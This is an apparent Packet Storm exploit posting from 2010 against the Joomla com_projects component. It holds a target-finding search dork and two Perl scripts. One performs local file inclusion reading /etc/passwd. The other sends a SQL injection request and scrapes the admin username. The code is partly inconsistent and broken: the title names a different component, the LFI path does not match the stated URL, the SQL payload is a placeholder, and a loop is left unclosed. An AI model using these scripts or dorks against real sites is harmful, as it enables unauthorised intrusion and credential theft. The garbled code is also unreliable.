what you don't know can hurt you

Joomla Projects Local File Inclusion / SQL Injection

Joomla Projects Local File Inclusion / SQL Injection
Posted Oct 27, 2010
Authored by jos_ali_joe

The Joomla Projects component suffers from local file inclusion and remote SQL injection vulnerabilities.

tags | exploit, remote, local, vulnerability, sql injection, file inclusion
MD5 | 98dd2711ddec9504dfa90b0a04c48211

Joomla Projects Local File Inclusion / SQL Injection

Change Mirror Download
=========================================================
Joomla Component com_projects LFI & SQL Vulnerability
=========================================================

[+]Title : Joomla Component com_calendrier RFI Vulnerability
[+]Author : jos_ali_joe
[+]Contact : josalijoe@yahoo.com
[+]Home : http://josalijoe.wordpress.com/


########################################################################

Dork : inurl:index.php?option="com_projects"

########################################################################

[ Software Information ]

########################################################################
[+] Vendor : http://www.codegravity.com/
[+] Download : http://www.joomla.org/download.html
[+] version : Joomla 1.5
[+] Vulnerability : LFI and SQL Vulnerability
[+] Dork : com_projects
########################################################################

[+] Exploit: LFI

====================================================================================
http://localhost/index.php?option=com_projects&controller=[ LFI ]
====================================================================================
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

print "\t\t########################################################\n\n";
print "\t\t# Joomla Component com_projects LFI Vulnerability #\n\n";
print "\t\t# by jos_ali_joe #\n\n";
print "\t\t########################################################\n\n";


if (!$ARGV[0])
{
print "Usage: perl idc.pl [HOST]\n";
print "Example: perl idc.pl http://localhost/LFI/\n";;
}

else
{

$web=$ARGV[0];
chomp $web;

$iny="agregar_info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00";

my $web1=$web.$iny;
print "$web1\n\n";
my $ua = LWP::UserAgent->new;
my $req=HTTP::Request->new(GET=>$web1);
$doc = $ua->request($req)->as_string;

if ($doc=~ /^root/moxis ){
print "Web is vuln\n";
}
else
{
print "Web is not vuln\n";
}

}

####################################################################################

[+] Exploit: SQL

====================================================================================
http://localhost/index.php?option=com_projects&view=project&id=[ SQL ]
====================================================================================

use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[// Joomla Component com_projects SQL Injection Exploit
[// Usage: idc.pl [target]
[// Example: idc.pl localhost.com
[// Vuln&Exp : jos_ali_joe
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/index.php?option=com_projects&view=project&id=";

print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);

if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}

if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}


$target = "SQL Injection Exploit";
$target = $host.$dir.$file.$target;

#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: * /*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}

####################################################################################

Thanks :

./kaMtiEz – ibl13Z – Xrobot – tukulesto – R3m1ck – jundab - asickboys- Vyc0d – Yur4kha - XPanda - eL Farhatz

./ArRay – akatsuchi – K4pt3N – Gameover – antitos – yuki – pokeng – ffadill - Alecs - v3n0m - RJ45

./Kiddies – pL4nkt0n – chaer newbie – andriecom – Abu_adam – Petimati - hakz – Virgi – Anharku - a17z a.k.a maho


./Me Family ATeN4 :

./N4ck0 - Aury - TeRRenJr - Rafael - aphe-aphe

Greets For :

./Devilzc0de crew – Kebumen Cyber – Explore Crew – Indonesian Hacker - Byroe Net - Yogyacarderlink - Hacker Newbie - Jatim Crew - Malang Cyber

My Team : ./Indonesian Coder


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    15 Files
  • 4
    Apr 4th
    5 Files
  • 5
    Apr 5th
    5 Files
  • 6
    Apr 6th
    27 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close